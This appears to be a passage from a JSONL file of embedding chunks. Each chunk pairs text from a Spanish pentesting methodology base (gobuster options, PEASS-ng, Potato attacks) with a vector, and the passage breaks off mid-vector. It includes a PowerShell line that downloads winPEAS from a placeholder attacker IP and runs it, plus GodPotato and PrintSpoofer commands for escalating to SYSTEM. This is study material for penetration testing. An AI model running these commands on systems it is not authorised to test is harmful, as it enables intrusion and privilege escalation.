file to write results to (defaults to stdout)\n -p, --pattern string File containing replacement patterns\n -q, --quiet Don't print the banner and other noise\n -t, --threads int Number of concurrent threads (default 10)\n -v, --verbose Verbose output (errors)\n -w, --wordlist string Path to the wordlist\n\nUse \"gobuster [command] --help\" for more information about a command.\n```", "v": [0.12738, 0.06386, -0.0809, -0.25227, 0.01717, -0.08715, -0.116, 0.02324, 0.14362, 0.09129, -0.16076, -0.17934, -0.06294, -0.07874, -0.09059, -0.12799, -0.06109, -0.1047, 0.00303, -0.023, -0.05479, -0.04416, -0.01801, -0.04292, 0.06233, 0.08152, -0.12183, 0.03377, -0.23095, -0.01009, -0.06912, -0.04539, 0.08383, -0.08825, -0.09208, 0.00973, -0.06491, 0.02994, -0.02416, 0.24046, -0.01693, 0.09055, -0.03058, 0.07168, 0.05708, -0.15534, 0.04315, 0.11192, 0.10948, -0.03954, -0.04936, 0.02386, 0.01416, 0.11482, 0.02321, -0.05995, 0.10597, -0.03867, -0.07937, -0.09769, -0.0764, -0.0826, -0.00614, -0.07845, 0.04256, -0.0013, 0.05552, -0.04111, 0.04739, 0.06964, -0.05327, 0.0212, -0.00584, -0.03322, 0.09467, 0.00552, -0.00709, -0.13705, 0.07874, 0.10569, -0.1204, 0.01556, 0.03757, -0.07253, 0.03431, -0.05674, -0.00337, -0.03601, -0.01443, -0.0235, 0.0507, 0.06026, 0.04881, 0.02426, 0.03574, -0.16039, -0.03218, 0.04042, 0.01903, -0.08141, 0.02791, 0.06379, -0.08732, 0.06957, 0.06889, -0.01445, 0.05501, 0.05394, -0.00342, 0.07319, 0.07089, -0.08361, 0.08286, -0.0456, 0.02665, -0.08752, 0.04551, -0.00632, -0.04696, 0.02606, 0.03945, -0.00612, -0.02222, 0.0436, 0.00925, -0.02119, 0.02893, 0.02051, 0.03019, -0.01478, -0.03055, 0.02115, 0.01265, -0.0829, -0.04355, 0.15891, 0.06312, 0.01511, 0.04563, -0.0434, -0.02399, 0.02827, -0.03359, 0.08382, 0.0372, 0.02475, -0.00333, -0.03074, -0.0324, 0.05277, 0.06725, 0.03338, 0.02425, -0.05606, -0.01711, -0.10027, 0.04809, 0.05316, -0.00279, -0.0904, 0.03709, 0.055, -0.0079, 0.01779, 0.01701, -0.00576, 0.00777, 0.03269, 0.01135, -0.05305, -0.04433, -0.0252, -0.01197, -0.06609, -0.0631, 0.0124, 0.00741, -0.00502, -0.01743, -0.04881, 0.04338, -0.02312, 0.03121, 0.05347, 0.08251, -0.06891, 0.02379, -0.03722, -0.00824, -0.05003, -0.03614, 0.05645, 0.0134, -0.07517, -0.03035, 0.05408, -0.00205, 0.00472, 0.00453, -0.0434, -0.05774, 0.04594, 0.04479, -0.03142, 0.07268, -0.00379, -0.00773, 0.03424, -0.00987, -0.00664, 0.06648, 0.04992, -0.01559, -0.01425, -0.05351, 0.00349, -0.04362, -0.00546, 0.0052, -0.05086, -0.00473, 0.05432, 0.00312, -0.0273, 0.03563, 0.02092, 0.05864, -0.01565, 0.00206, -0.00533, 0.01173, -0.00446, -0.05352, -0.02765, -0.01299, -0.00545, -0.05448, 0.01535, -0.01219, 0.00861, -0.02383, -0.03134, 0.01781, 0.00371, 0.00955, 0.01705, -0.02773, -0.02535, -0.00682, -0.00141, -0.05629, -0.04745, -0.05887, -0.07989, -0.00798, -0.00254]} +{"tipo": "metodologia", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "texto": "# PEASS-ng (winPEAS / linPEAS)\n\n> Scripts que **enumeran automáticamente** todos los vectores de privesc. En `tu carpeta`.", "v": [0.0285, -0.18696, -0.1594, -0.03798, 0.10497, -0.04549, 0.1314, -0.17847, -0.0931, -0.10024, -0.06618, 0.04721, -0.13434, -0.07795, 0.12838, 0.08868, -0.04287, -0.08106, 0.17982, 0.09763, 0.02526, 0.00388, -0.19298, 0.03457, 0.02325, 0.24275, 0.08007, 0.06992, -0.09309, 0.03157, -0.01746, 0.14322, -0.01989, -0.05462, 0.00751, -0.0736, -0.02992, 0.10418, 0.04254, 0.22106, 0.0667, 0.19919, -0.16277, 0.05754, -0.03767, -0.10238, 0.04369, 0.11093, 0.00749, -0.02985, -0.09094, 0.04343, -0.0219, -0.01185, 0.08278, 0.08389, 0.05885, 0.00992, -0.0832, 0.02106, -0.00113, 0.021, -0.0079, -0.10476, 0.05697, -0.00953, 0.15643, -0.0818, 0.0099, -0.00453, 0.02942, 0.12412, 0.03479, -0.06878, 0.05795, 0.00637, -0.11402, -0.01228, 0.01684, 0.06052, -0.00551, -0.0679, -0.02389, 0.04048, 0.06832, -0.00942, -0.03005, -0.01514, -0.03764, -0.05251, 0.09297, -0.06329, -0.02581, 0.07755, 0.04737, -0.02732, -0.06558, -0.01274, 0.0844, 0.04567, -0.08065, -0.00193, -0.08266, 0.05573, 0.01254, 0.01779, 0.01959, 0.05239, 0.03689, -0.06477, 0.09241, 0.02843, -0.09665, 0.01527, -0.01963, -0.03806, -0.01095, 0.0137, 0.0299, -0.05981, -0.00267, -0.03857, 0.01504, 0.03947, 0.00036, -0.04021, -0.03658, 0.09452, 0.01797, 0.05332, -0.02356, -0.00187, -0.0667, -0.09601, -0.03112, 0.03422, -0.04575, -0.0541, 0.06874, -0.0019, 0.02516, 0.02295, 0.03959, -0.04653, 0.03234, -0.0871, 0.0668, -0.09525, 0.03242, 0.01912, 0.04346, -0.00056, -0.00808, 0.03623, 0.02714, -0.03045, 0.01617, 0.04132, -0.03547, 0.02373, 0.02595, 0.00373, 0.04053, 0.03372, -0.0031, -0.01928, 0.04728, -0.01048, -0.02987, 0.01795, -0.01155, -0.0233, -0.08667, 0.02059, -0.08976, -0.06094, 0.05744, -0.03091, -0.03789, -0.0089, -0.02257, -0.06453, 0.02124, 0.02422, -0.04846, -0.00594, 0.00554, -0.01486, 0.01926, -0.02958, 0.00192, 0.0583, -0.04406, -0.05291, -0.07314, -0.01647, -0.00851, -0.00801, -0.00419, -0.05134, -0.06755, 0.0739, -0.02303, 0.00383, 0.03589, 0.042, -0.06084, -0.00801, -0.02243, 0.00335, 0.01046, -0.00925, 0.02041, -0.02351, 0.00895, -0.00085, 0.02839, 0.03113, -0.00352, -0.01773, 0.01722, 0.04534, 0.04933, 0.00158, 0.00066, 0.01941, 0.01141, 0.0667, 0.00885, -0.03129, -0.04631, -0.02846, 0.02129, -0.06482, 0.04989, 0.04153, 0.00052, -0.06153, 0.0128, -0.02138, 0.03217, 0.02614, -0.01606, -0.04952, -0.03288, -0.07297, -0.02596, 0.03137, -0.0051, 0.00761, 0.00332, -0.03617, 0.00053, -0.07999, -0.00432, -0.01083]} +{"tipo": "metodologia", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "texto": "# Kali (servir): cd tu carpeta && python3 -m http.server 80 → Transferencia de ficheros\n```\n```powershell", "v": [0.10831, -0.12942, -0.01542, -0.08041, 0.02081, -0.27922, 0.11756, 0.04438, -0.0037, 0.02291, -0.04568, -0.0119, -0.10184, -0.15071, -0.03771, -0.01697, 0.04971, -0.01377, 0.16596, -0.05975, 0.02683, 0.05765, -0.05872, -0.07806, -0.04568, 0.17754, 0.05368, -0.00099, -0.07156, -0.03442, 0.15047, 0.0462, 0.04429, 0.01341, 0.02984, -0.0001, -0.05122, 0.00651, -0.03918, 0.151, -0.0251, 0.08008, -0.0197, 0.13754, 0.02222, -0.1163, 0.11984, -0.02013, 0.04552, 0.01486, -0.01609, -0.12602, -0.08493, -0.02594, 0.05389, -0.09525, 0.14896, -0.03939, 0.06516, 0.0923, -0.08385, 0.00321, -0.06907, 0.06368, 0.08262, -0.00485, 0.03361, -0.13301, -0.16965, 0.15529, -0.16526, 0.0084, 0.05141, -0.03054, -0.01565, -0.09267, -0.03079, -0.08885, -0.00233, 0.05396, -0.01638, -0.08211, -0.03103, -0.05471, -0.0542, -0.04985, 0.12469, -0.02616, -0.01851, 0.01912, 0.0903, -0.02286, -0.02901, 0.05652, 0.05191, -0.01294, 0.0254, -0.02956, 0.04742, -0.01473, -0.01625, 0.02977, -0.04133, 0.07825, 0.04401, 0.07126, -0.08808, -0.01291, -0.01979, -0.04211, 0.10287, -0.0316, 0.08661, 0.03066, -0.01277, -0.04558, -0.01674, 0.04501, -0.02675, 0.03953, -0.06765, -0.0368, -0.02029, 0.08944, -0.02997, -0.07271, 0.00392, 0.11707, -0.09838, 0.05899, -0.01521, -0.02613, -0.09675, -0.03394, 0.04848, 0.01775, -0.0212, 0.05118, 0.05258, 0.04075, 0.00837, 0.09437, -0.04898, 0.05271, 0.0196, 0.06833, 0.111, -0.01932, -0.01205, -0.07051, 0.06743, 0.05174, 0.01003, 0.00884, 0.06729, -0.02875, -0.02867, -0.03412, -0.09281, -0.11554, 0.04379, 0.04568, 0.04574, 0.02356, 0.06374, -0.01725, -0.00506, 0.01356, 0.05793, -0.00479, -0.08019, -0.01196, -0.02857, -0.06633, -0.00364, -0.10012, 0.05954, -0.04391, -0.00302, -0.00202, 0.05301, -0.03827, -0.04598, 0.04082, 0.03729, 0.01241, 0.00392, -0.02591, -0.04991, -0.0276, 0.04119, 0.08922, -0.04257, -0.03232, 0.04627, -0.0105, -0.00058, -0.06558, 0.01811, -0.04013, -0.03845, -0.03416, -0.01418, -0.04175, -0.00861, 0.02896, -0.04415, 0.00122, -0.08142, -0.00355, 0.03427, -0.02948, 0.08261, 0.01064, 0.02822, -0.02605, -0.00229, 0.07469, 0.04167, -0.07389, -0.01882, 0.05072, 0.04069, 0.0243, -0.01976, 0.02797, 0.02631, -0.03891, 0.03485, 0.01253, -0.07576, 0.05262, 0.01778, -0.03625, 0.03792, -0.04703, -0.04424, -0.02047, -0.05799, -0.03771, -0.02566, 0.02838, 0.00276, -0.04265, -0.02649, -0.0158, -0.04259, -0.01203, -0.02682, -0.04919, 0.01334, -0.09055, -0.00821, -0.00839, -0.01074, -0.03193]} +{"tipo": "metodologia", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "texto": "# Windows:\niwr http://TU_IP/winPEASx64.exe -OutFile C:\\Windows\\Temp\\wp.exe ; C:\\Windows\\Temp\\wp.exe\n```\n```bash", "v": [-0.16902, -0.0514, -0.05169, -0.07019, 0.09606, -0.1035, -0.01453, -0.0719, 0.0534, -0.04429, -0.06178, -0.05814, -0.05947, 0.01144, -0.07211, 0.00315, -0.00351, -0.02051, 0.11639, -0.05964, 0.02359, 0.01456, -0.12443, 0.03038, 0.09616, 0.1561, -0.16143, 0.00238, -0.1046, -0.07023, 0.01686, -0.00113, -0.01068, -0.06824, 0.03189, 0.03808, -0.1, 0.03967, 0.05816, 0.14238, 0.06138, 0.0704, -0.14898, 0.15571, 0.06855, -0.08663, 0.10606, -0.02604, 0.16812, -0.06362, -0.0088, -0.07001, -0.02859, -0.02685, 0.10038, -0.05178, 0.11314, -0.04551, -0.04837, 0.03887, -0.01111, 0.20488, -0.01992, 0.00489, 0.06933, 0.01381, 0.08064, -0.07229, -0.00332, 0.07324, -0.0961, 0.02931, -0.01708, -0.06452, 0.03913, -0.06978, -0.09092, -0.09507, 0.13736, -0.04081, 0.00882, 0.08923, -0.01285, -0.09434, -0.06355, -0.11657, 0.02152, -0.08845, 0.01601, -0.0556, 0.14044, -0.02846, -0.05871, 0.16853, 0.08386, -0.1477, 0.00945, -0.00855, 0.05284, 0.13117, -0.04979, -0.01941, -0.0587, 0.06439, 0.00521, 0.05009, -0.01438, -0.00482, -0.05391, -0.02844, 0.04433, 0.08627, -0.01151, 0.00586, -0.02335, -0.06592, -0.05521, -0.03857, -0.01865, 0.05259, -0.02973, -0.05467, -0.03942, 0.01211, -0.04154, -0.07333, -0.04541, 0.11665, -0.06837, -0.00956, 0.03276, -0.00908, 0.01628, 0.01759, -0.06236, 0.06469, -0.01124, 0.04854, 0.04225, -0.05187, 0.14525, 0.06612, 0.06148, 0.02638, 0.03746, 0.01379, 0.06936, 0.0455, 0.00736, -0.02069, 0.1092, -0.04941, -0.02272, 0.03728, -0.08178, -0.00645, 0.02684, 0.14675, 0.06723, -0.04524, -0.00459, 0.02323, 0.00449, 0.00425, 0.00688, 0.00224, 0.02258, 0.06587, 0.05229, -0.02854, -0.02823, 0.06665, -0.05441, -0.06158, -0.01603, -0.0326, 0.05751, -0.06011, 0.0075, -0.03708, -0.05699, -0.02379, 0.06641, -0.00123, -0.05945, 0.05902, -0.01838, 0.03358, -0.05013, 0.00663, -0.0369, 0.00378, -0.01987, -0.08457, -0.01675, -0.02398, -0.02295, -0.0463, 0.05952, -0.00618, -0.07928, -0.01822, -0.02208, -0.0474, 0.0907, 0.013, -0.03651, 0.03115, -0.00663, 0.05703, 0.00403, 0.00074, -0.01032, -0.03674, -0.02164, -0.04463, 0.08109, -0.00487, -0.01408, 0.0073, -0.02037, 0.04988, 0.0907, -0.01153, -0.0097, 0.00571, -0.00139, -0.02004, 0.00514, -0.00099, -0.06237, 0.02633, -0.00607, -0.00707, 0.04869, -0.00229, 0.01609, -0.0918, -0.01556, -0.03255, -0.00984, 0.03712, -0.05493, -0.0893, -0.07377, -0.06728, -0.01271, 0.0168, 0.04869, -0.05655, -0.00872, -0.01591, 0.00688, -0.03763, -0.0378, 0.02987]} +{"tipo": "metodologia", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "texto": "## Regla de oro\n**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lógica de un script cron concreto).\n\nRelacionado: GTFOBins y LOLBAS · Metodología OSCP · OSCP MOC", "v": [-0.14687, -0.22596, -0.12015, -0.11065, -0.0055, -0.20027, 0.01634, -0.00313, -0.16959, -0.06536, 0.04692, -0.08723, 0.12585, 0.01097, 0.17763, -0.00383, -0.01476, -0.04231, -0.09796, 0.01302, -0.08775, -0.06443, -0.16609, -0.04058, 0.21377, 0.07108, 0.09298, -0.05699, -0.08901, -0.01653, -0.02699, 0.06859, 0.00603, 0.0461, -0.05276, 0.07993, -0.00109, 0.03717, 0.09076, 0.2355, 0.02456, 0.0352, -0.11637, 0.11988, 0.12915, -0.11016, 0.11541, 0.10781, -0.0121, -0.08106, -0.00515, -0.04001, -0.0693, -0.08586, 0.02448, 0.01796, 0.05769, -0.00277, -0.00247, 0.01169, -0.03305, 0.06066, -0.01781, -0.07033, 0.08494, 0.0509, 0.05783, -0.0638, 0.00627, -0.03794, -0.07892, 0.15661, -0.09782, -0.01445, 0.12902, -0.05825, -0.03552, 0.00237, 0.20471, -0.00935, -0.04195, -0.03171, 0.01802, 0.05848, -0.04869, -0.09914, 0.07846, 0.0525, -0.06664, -0.04641, 0.08384, -0.06913, -0.06691, 0.04586, 0.10446, -0.09175, 0.01324, -0.01654, 0.02963, 0.02341, -0.01049, 0.02946, -0.02726, 0.07175, 0.00607, 0.04477, 0.0747, 0.03517, 0.06973, -0.02465, 0.06088, 0.04626, -0.02007, 0.06202, 0.00083, 0.00141, 0.05497, 0.01812, -0.00191, -0.06549, -0.05374, -0.01187, -0.0279, -0.02929, -0.02383, 0.00356, 0.02119, 0.14129, 0.01422, 0.0169, -0.03101, -0.02603, -0.00467, -0.00303, -0.03685, 0.08454, 0.00051, -0.02687, 0.00693, -0.02835, 0.05304, 0.06679, 0.04347, -0.01885, 0.10052, -0.03748, 0.05236, -0.02305, 0.00874, -0.0144, 0.04388, -0.00248, -0.00604, 0.00685, 8e-05, -0.04421, 0.02009, 0.0345, -0.03899, 0.02087, 0.05626, 0.00547, -0.00922, 0.01613, -0.05555, -0.01323, 0.04262, -0.01818, -0.0104, -0.05348, -0.00804, 0.00979, -0.12324, 0.01901, -0.03544, -0.09099, 0.06832, -0.06713, -0.06555, -0.05308, -0.01517, 0.00955, 0.04403, 0.0061, -0.01472, -0.00995, 0.00628, -0.02568, 0.01615, -0.04781, -0.01413, 7e-05, -0.00846, 0.00372, 0.01843, 0.03682, -0.00783, -0.07147, -0.01131, -0.02761, -0.07496, 0.04059, -0.02044, 0.02808, 0.00031, 0.02052, 0.01056, 0.02885, -0.05336, 0.0166, 0.01619, -0.04446, 0.02556, -0.08076, 0.02044, -0.00019, -0.0007, 0.01141, -0.00922, 0.00237, 0.06345, 0.02747, 0.04707, -0.01876, 0.02198, -0.03319, -0.00799, 0.02632, 0.02615, -0.01196, 0.00916, 0.03517, -0.0014, -0.05889, 0.02986, 0.06289, 0.04134, -0.00038, 0.00127, -0.05747, 0.00988, 0.02533, -0.02485, -0.03857, -0.07272, -0.03156, -0.00098, -0.01282, 0.00662, -0.02135, 0.00861, -0.03274, -0.03195, -0.10398, -0.03792, 0.02965]} +{"tipo": "metodologia", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "texto": "# Potato attacks\n\n> Cuando `whoami /priv` muestra **SeImpersonatePrivilege** o **SeAssignPrimaryTokenPrivilege** → abuso de token a **NT AUTHORITY\\SYSTEM**.", "v": [-0.41534, -0.10731, -0.07507, -0.05289, 0.13727, -0.12922, -0.0068, -0.13358, -0.07302, 0.07736, -0.08753, 0.03393, 0.09769, 0.05749, 0.04222, 0.04106, 0.054, -0.18358, 0.11504, 0.14206, 0.02341, 0.03354, 0.00588, -0.00271, 0.11714, 0.09395, 0.07013, 0.0026, -0.05532, 0.04187, 0.02591, 0.00243, 0.00036, -0.13645, 0.0304, -0.19729, -0.01979, 0.03672, 0.05055, 0.14159, 0.1579, 0.02217, -0.03013, 0.07075, 0.12304, 0.02601, 0.02431, 0.00732, 0.012, -0.12177, -0.07377, 0.05776, -0.03806, -0.09077, 0.08757, -0.01544, -0.00497, 0.03804, -0.02488, 0.0066, 0.01199, -0.09158, 0.04035, -0.09519, 0.04151, -0.05086, 0.07211, 0.05908, -0.06056, 0.02072, -0.06903, -0.07591, 0.01513, -0.08992, 0.03648, 0.06944, -0.0157, -0.06992, 0.08496, -0.02981, -0.02888, -0.04802, -0.0775, -0.00122, -0.02239, 0.03003, 0.13302, -0.00881, -0.02888, -0.01621, 0.14696, -0.01771, 0.01861, 0.02535, 0.00937, 0.03476, -0.11524, -0.01057, 0.02703, 0.01038, 0.09829, -0.02324, 0.02655, 0.04427, 0.05832, 0.05404, 0.005, -0.01261, 0.00998, -0.10237, -0.06402, -0.05702, -0.00545, -0.0556, -0.00329, 0.0149, -0.01153, 0.01416, 0.06959, -0.00863, -0.01032, -0.03725, -0.04168, 0.03964, 0.04653, -0.03117, 0.00306, 0.00886, -0.06067, 0.04609, 0.04729, 0.02106, 0.01231, -0.00238, 0.03627, 0.07074, -0.02044, -0.03286, 0.06538, -0.06441, 0.08037, 0.06694, 0.04772, 0.00161, 0.05963, 0.02598, 0.00625, -0.04129, -0.04721, 0.07465, 0.04459, 0.02766, 0.09311, 0.05743, 0.01926, -0.02533, -0.01925, -0.0887, -0.0218, -0.01937, 0.034, 0.03042, 0.03584, 0.04498, 0.01817, -0.02706, 0.04956, -0.10321, 0.0275, -0.04303, 0.03925, -0.01248, -0.04755, 0.00649, -0.00488, -0.10091, -0.00839, -0.01898, -0.04908, -0.0378, -0.03956, -0.03926, 0.04473, -0.02039, -0.01265, -0.01232, -0.02521, -0.00794, 0.01966, 0.01222, 0.02006, 0.10146, 0.02803, -0.00379, -0.0424, -0.0103, -0.04348, -0.0449, 0.04521, 0.0155, 0.01547, 0.01712, -0.09413, -0.02348, -0.05105, 0.06081, -0.00585, -0.03313, -0.08737, 0.03296, 0.03836, -0.02804, 0.05179, -0.04375, -0.0441, -0.0186, 0.04531, -0.01699, -0.03059, 0.01668, -0.02516, 0.0719, 0.05735, 0.00878, 0.03629, 0.00675, 0.02437, -0.00147, 0.03958, -0.00404, -0.01754, 0.03379, 0.02933, -0.06881, 0.02261, 0.04243, 0.0197, -0.02867, -0.03105, -0.04443, 0.04911, 0.07314, -0.03286, -0.07889, -0.02445, -0.10004, -0.01747, 0.022, 0.03544, -0.00796, 0.00767, 0.03118, 0.0147, -0.05374, 0.02281, -0.03289]} +{"tipo": "metodologia", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "texto": "## El gatillo\n```\nwhoami /priv → busca SeImpersonatePrivilege = Enabled\n```\nTípico en cuentas de servicio (IIS, MSSQL `sa`, etc.).", "v": [-0.28234, 0.05672, 0.03052, 0.09456, 0.04696, -0.27873, -0.05396, -0.16095, -0.067, 0.0334, -0.06953, -0.00477, 0.10138, -0.02023, 0.03056, 0.0024, 0.10566, -0.0901, 0.04674, 0.01451, 0.04439, 0.02223, -0.02422, 0.00815, -0.09357, 0.05383, 0.03746, 0.13079, -0.10502, 0.11846, 0.01007, 0.00227, -0.12524, -0.21024, 0.01546, -0.114, -0.02186, 0.09429, 0.01498, 0.04287, 0.1215, -0.04358, -0.09985, 0.04919, 0.05231, -0.16877, 0.05788, 0.07513, 0.02398, 0.07594, -0.08046, 0.02349, -0.07529, -0.02353, 0.04387, -0.03762, 0.06014, 0.00223, -0.06939, -0.0052, -0.0044, -0.03194, 0.0937, 0.04301, 0.03192, -0.03195, 0.12276, 0.09941, 0.01899, -0.01163, -0.11457, 0.00764, -0.06754, -0.05967, 0.01156, 0.0105, 0.03467, -0.05878, 0.0833, 0.06945, -0.04813, -0.09571, -0.09462, 0.05971, -0.02644, -0.01687, 0.07231, 0.0017, -0.05573, 0.02427, 0.08523, -0.01624, -0.01595, -0.0105, -0.05737, 0.0533, -0.02048, 0.06039, 0.07202, -0.02466, 0.02562, 0.08356, -0.03667, 0.08762, -0.04997, 0.08193, 0.07431, -0.06299, -0.01894, -0.04218, 0.04731, -0.062, 0.04312, -0.03345, -0.04775, 0.10354, -0.04592, -0.00901, 0.07661, 0.05469, 0.02736, -0.04663, 0.0072, 0.03196, -0.03616, -0.13686, -0.08159, 0.00554, 0.03116, 0.06294, 0.02865, -0.0412, -0.03166, -0.02831, -0.0343, -0.01148, -0.05776, -0.04448, 0.01856, -0.01635, 0.02249, -0.05814, 0.00689, -0.03878, 0.03616, 0.03722, 0.10153, -0.07486, -0.04803, 0.07402, -0.02761, 0.02729, 0.02846, 0.09368, 0.01321, -0.06273, -0.06122, -0.01385, -0.03467, 0.0024, -0.01734, 0.01612, 0.09061, 0.00917, -0.05552, -0.00178, -0.03235, -0.15628, 0.05501, -0.13997, -0.02902, -0.00904, -0.00718, -0.09411, 0.03053, -0.10416, 0.01442, -0.049, 0.01461, -0.00448, 0.01393, -0.04456, 0.03358, -0.00593, -0.02695, -0.04978, -0.01577, -0.02138, 0.01764, -0.02597, -0.00048, -0.05083, 0.01513, -0.03059, -0.04253, -0.01793, 0.02112, 0.00239, -0.00899, -0.01916, -0.03321, -0.00713, -0.13224, 0.04026, -0.01412, 0.01614, 0.01251, 0.01356, -0.02091, 0.00124, -0.04086, -0.01109, 0.03425, -0.03434, -0.0235, 0.01118, 0.03265, 0.00305, 0.0325, 0.03148, -0.0404, -0.02349, 0.01449, 0.03309, 0.0782, 0.04372, 0.02247, -0.00854, 0.0198, 0.00025, -0.09113, 0.02317, 0.05196, -0.07635, 0.00337, 0.08847, 0.03121, -0.0544, 0.02382, -0.05611, 0.02445, 0.06889, -0.00872, -0.05625, -0.02376, -0.07576, -0.08298, 0.02305, -0.02065, -0.04501, -0.02867, -0.00546, -0.03558, -0.04769, 0.05164, -0.00507]} +{"tipo": "metodologia", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "texto": "## La familia\n```\nJuicyPotato → Windows antiguos\nPrintSpoofer → Windows 10/Server 2016-2019 (servicio de impresión)\nGodPotato → moderno, muy fiable hoy\nRoguePotato / RottenPotato → variantes\n```", "v": [-0.27442, -0.07553, 0.04868, -0.05581, 0.09176, -0.08445, 0.15514, -0.17033, 0.0272, -0.04708, -0.03673, -0.14252, 0.15006, 0.04592, -0.06546, 0.02797, 0.0039, -0.02665, -0.06312, 0.00637, -0.06716, -0.03425, -0.01836, -0.08391, 0.11594, 0.09824, 0.11362, 0.04242, -0.10496, 0.0971, 0.07164, -0.00098, -0.08868, -0.05981, -0.08263, -0.04911, 0.00929, -0.00773, -0.0219, 0.1272, 0.14306, 0.04463, -0.04026, 0.11821, 0.08577, 0.03361, 0.12314, 0.00051, 0.0322, 0.03254, 0.0019, -0.13381, 0.05836, -0.01888, 0.05137, -0.02086, 0.06477, 0.04295, -0.06988, 0.01919, 0.06224, 0.11837, -0.01921, -0.04045, 0.00402, 0.00213, -0.06044, -0.06153, 0.06238, 0.07091, -0.09283, 0.02517, 0.06103, -0.03805, -0.09084, 0.06294, 0.06333, -0.01317, 0.0753, -0.00153, -0.07525, 0.09211, 0.07003, -0.15852, 0.02163, -0.10924, 0.05699, -0.0175, 0.02457, -0.10449, 0.18677, 0.02042, 0.05149, 0.08709, 0.09752, 0.01516, -0.04172, -0.05268, 0.00051, 0.07947, -0.03867, -0.01058, -0.00516, 0.01504, -0.0095, 0.03307, -0.01666, -0.06327, -0.03397, -0.10531, 0.0317, 0.04661, 0.07785, -0.00664, -0.01588, 0.00603, 0.06585, 0.01956, 0.00044, 0.08118, -0.03572, 0.03188, 0.03874, -0.04448, 0.03138, -0.11387, -0.01912, 0.0556, -0.13623, 0.012, 0.00588, -0.04635, 0.01877, 0.00971, -0.05009, 0.10117, 0.02198, -0.06612, 0.05504, -0.13694, 0.06099, 0.07369, 0.08928, -0.00041, 0.03249, 0.076, 0.11764, 0.03136, -0.02591, -0.0153, 0.02992, 0.02931, -0.00114, 0.04767, 0.03096, -0.03728, -0.05388, -0.01402, -0.00823, 0.01494, 1e-05, -0.01494, 0.00535, -0.03549, -0.04085, -0.00937, 0.0244, 0.04689, 0.02872, -0.1055, -0.06945, -0.03419, -0.04448, -0.02051, -0.02144, 0.01317, 0.05574, 0.01667, -0.08993, 0.01101, -0.11932, -0.04618, -0.05667, 0.05815, -0.05019, -0.03232, 0.0062, 0.07578, 0.0329, -0.08404, -0.01653, -0.0076, 0.03764, -0.0145, 0.05088, 0.00842, 0.0099, -0.00344, 0.02328, 0.05542, 0.00156, -0.05978, -0.01736, -0.0527, 0.05616, 0.01371, 0.02459, 0.04858, -0.01521, 0.04831, 0.01704, -0.00015, -0.01294, -0.06622, -0.01122, -0.06826, 0.01967, -0.09298, 0.05389, 0.04007, 0.03885, 0.03047, -0.00152, 0.05012, 0.00898, 0.0028, -0.00132, -0.0753, 0.03433, -0.0434, -0.02173, 0.09267, -0.06415, -0.03551, -0.00503, 0.0367, 0.02666, -0.05809, -0.05532, -0.05041, -0.02032, 0.04574, 0.0117, -0.00285, -0.03262, -0.06322, -0.06409, 0.02326, 0.01627, -0.05558, -0.01506, -0.01079, -0.02213, -0.07436, 0.00239, 0.01564]} +{"tipo": "metodologia", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "texto": "## Uso típico (GodPotato/PrintSpoofer)\n```\nGodPotato.exe -cmd \"cmd /c whoami\"\nPrintSpoofer.exe -i -c cmd\n```\nSubes el .exe con Transferencia de ficheros.", "v": [-0.16712, -0.04619, 0.04056, -0.06438, 0.16868, -0.14677, 0.1219, -0.03774, -0.05297, -0.03791, -0.0825, 0.08642, -0.02889, -0.03505, -0.10807, -0.043, 0.09353, 0.00902, 0.03616, -0.04928, 0.03457, -0.02743, 0.01229, 0.04261, 0.11874, 0.16933, -0.08034, 0.01363, -0.06491, -0.03151, 0.04328, 0.04444, 0.00445, -0.08351, -0.00489, -0.00699, -0.0801, -0.07733, -0.064, 0.19057, 0.1005, 0.06627, -0.14074, 0.09104, 0.03486, -0.18853, 0.08445, 0.05756, 0.16529, -0.03616, -0.01266, -0.12648, -0.14981, -0.06146, 0.07137, 0.0087, 0.08816, -0.04321, -0.10766, 0.08967, 0.00969, -0.02512, 0.07223, 0.04406, 0.11117, -0.00554, 0.03174, -0.0993, -0.08144, 0.06618, -0.10857, 0.06385, -0.04937, -0.05496, -0.00257, -0.08387, -0.05366, 0.00094, 0.1333, -0.05632, -0.07356, 0.00375, -0.02081, -0.15589, 0.00454, -0.08571, 0.02851, -0.04398, -0.03775, -0.04741, 0.14618, -0.01434, 0.01677, 0.0647, 0.0884, -0.05812, -0.04699, -0.00697, 0.08504, 0.00797, 0.03657, 0.04348, 0.00609, 0.1082, -0.03401, 0.01413, -0.01569, 0.03427, -0.05211, -0.03981, 0.09445, -0.001, 0.09405, 0.01289, -0.00771, -0.03158, -0.06757, -0.00378, -0.03376, -0.02685, -0.0358, -0.05444, -0.04439, 0.01251, -0.03107, -0.13617, -0.0533, 0.07929, -0.05439, 0.01212, -0.0117, -0.05979, 0.05127, -0.05652, -0.07919, 0.01124, 0.05815, 0.00377, -0.00393, -0.02996, 0.06709, 0.1161, -0.02212, 0.06999, 0.054, 0.04632, 0.04253, 0.0704, 0.01654, -0.03425, 0.11687, 0.04134, -0.01391, 0.05017, -0.03389, -0.02366, -0.00012, 0.07162, 0.00296, -0.00702, -0.02287, 0.00222, 0.04296, 0.00063, -0.03282, 0.01975, 0.00674, -0.05475, -0.05401, 0.03181, -0.03074, 0.00172, 0.0031, -0.10247, 0.02951, -0.08439, 0.02368, -0.13083, -0.00612, 0.01649, -0.06383, 0.01784, 0.06488, 0.05597, -0.04983, -0.05095, -0.0046, 0.00011, -0.04876, -0.02084, 0.00672, 0.06232, -0.02091, -0.06298, 0.02592, 